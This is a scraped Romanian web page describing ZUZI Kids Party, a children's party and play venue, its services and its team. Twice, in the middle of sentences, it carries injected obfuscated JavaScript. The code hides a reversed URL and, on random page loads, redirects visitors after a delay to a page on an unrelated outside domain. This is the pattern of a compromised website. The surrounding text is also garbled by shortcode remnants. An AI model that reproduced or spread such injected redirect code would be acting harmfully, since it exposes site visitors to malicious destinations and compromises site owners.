Despre ZUZI PARTY

Liber la distractie, liber la noi amintiri!!

”CREDEM

”Echipa

) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dorim să fim alături de dumneavoastră la cele mai importante evenimente din viața copilului dumneavoastră. Distracția este garantată!
” number=”1″ link=”url:%23|title:Teachers|”]
2

GARANTĂM...

Toate serviciile noastre sunt de cea mai bună calitate. De la atenția oferită copiilor, pentru ca joaca lor să se desfășoare dinamic, fără incidente, pentru ca mânuțele să fie curate înainte de masă, și până la interacțiunea cu părinții, cărora nu trebuie să le lipsească nimic, echipa Zuzi Kids Party pune preț pe detalii și starea dumneavoastră de bine.

3

CONSTRUIM...

Conștientă de faptul că amintirile copilăriei au un impact major în dezvoltarea oricărui micuț, echipa Zuzi Kids Party își propune să construiască cele mai plăcute și intense amintiri. Fie că sărbătoriți câțiva anișori, un botez sau o zi specială din viața celui mic, Zuzi Kids Party va face din aceste momente cele mai frumoase amintiri.

”Despre

”Zuzi

) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}doua casă, în care am pus tot ceea ce avem noi mai frumos: atenție, creativitate, poftă de joacă, pasiune și multă iubire.
Suntem părinți și cunoaștem foarte bine nevoia celor mici de a se manifesta liber, de a se juca până la epuizare, de a râde și de a se bucura de propria lor energie. De aceea, am încercat să satisfacem toate aceste nevoi: avem piscină cu bile, jucării pentru toate vârstele și toate gusturile, spațiu mare de joacă, unde cei mici să se simtă liberi.
Și pentru a veni și în întâmpinarea „nevoilor” părinților, avem un spațiu amenajat special pentru ei, un loc cochet, în care adulții să se poată bucura de un capuccino savuros sau o pizza gustoasă. Bineînțeles, totul în apropierea copiilor, pentru că știm cât de importanți sunt aceștia pentru dumneavoastră.
„Liber la distracție, liber la noi amintiri!” este deviza noastră și încercăm să facem din fiecare eveniment organizat împreună cu noi, un moment memorabil, care să-și lase „amprenta” pentru o viață. Sau cel puțin până la următoarea aniversare!
Prin intermediul proiectului „Închirieri Costume” venim atât în sprijinul părinților, care sunt lipsiți de inspirație într-un anumit moment, sau care vor ca cel mic să „devină” ce personaj își dorește, cât și în sprijinul celor micuți, pentru că știm că distracția trebuie manifestată dincolo de locul nostru de joacă.” icon=”icon-info”]

Petreceri copii si evenimente

Evenimente

Petreceri

Echipa noastra

Colaboratori

Locatie

Contact

Nume (obligatoriu)

Email (obligatoriu)

Subiect

Mesaj